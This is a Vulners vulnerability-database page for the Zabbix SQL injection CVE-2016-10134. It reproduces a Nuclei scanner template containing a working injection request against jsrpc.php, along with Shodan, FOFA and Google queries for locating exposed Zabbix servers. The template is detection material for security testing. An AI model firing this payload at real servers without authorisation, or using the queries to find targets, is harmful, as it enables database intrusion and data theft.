Vulners
Lucene search
Zabbix - SQL Injection
| Reporter | Title | Published | Views | Family All 48 |
|---|---|---|---|---|
 | Exploit for SQL Injection in Zabbix | 15 Apr 202120:29 | – | gitee |
| Exploit for SQL Injection in Zabbix | 8 Jun 202121:12 | – | gitee |
| Exploit for SQL Injection in Zabbix | 20 Mar 202216:48 | – | gitee |
| Exploit for SQL Injection in Zabbix | 24 Nov 202219:58 | – | gitee |
| Exploit for SQL Injection in Zabbix | 18 Feb 202314:38 | – | gitee |
| Exploit for SQL Injection in Zabbix | 22 Jan 202112:57 | – | gitee |
| Exploit for SQL Injection in Zabbix | 8 Apr 202211:20 | – | gitee |
| Exploit for SQL Injection in Zabbix | 16 May 202115:40 | – | gitee |
| Exploit for SQL Injection in Zabbix | 20 Mar 202115:17 | – | gitee |
| Exploit for SQL Injection in Zabbix | 6 Jul 202113:18 | – | gitee |
10
id: CVE-2016-10134
info:
name: Zabbix - SQL Injection
author: princechaddha
severity: critical
description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the Zabbix application and underlying systems.
remediation: |
Apply the latest security patches or upgrade to a patched version of Zabbix to mitigate the SQL Injection vulnerability (CVE-2016-10134).
reference:
- https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
- https://nvd.nist.gov/vuln/detail/CVE-2016-10134
- https://support.zabbix.com/browse/ZBX-11023
- https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936
- http://www.debian.org/security/2017/dsa-3802
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-10134
cwe-id: CWE-89
epss-score: 0.86228
epss-percentile: 0.99419
cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zabbix
product: zabbix
shodan-query:
- http.favicon.hash:892542951
- http.title:"zabbix-server"
- cpe:"cpe:2.3:a:zabbix:zabbix"
fofa-query:
- icon_hash=892542951
- app="zabbix-监控系统" && body="saml"
- title="zabbix-server"
google-query: intitle:"zabbix-server"
tags: cve2016,cve,zabbix,sqli,vulhub,vuln
http:
- method: GET
path:
- "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Error in query [INSERT INTO profiles (profileid, userid'
- 'You have an error in your SQL syntax'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100c9e17623487a6f8196e1db15bf6accedf340b532124c944d72adbd1a8048f8b902207e84dc7302176c6112b80259863cfc33b817046e0c87d4a95c8eb4a04adcceba:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.4High risk
Vulners AI Score8.4
CVSS 27.5
CVSS 39.8
EPSS0.86228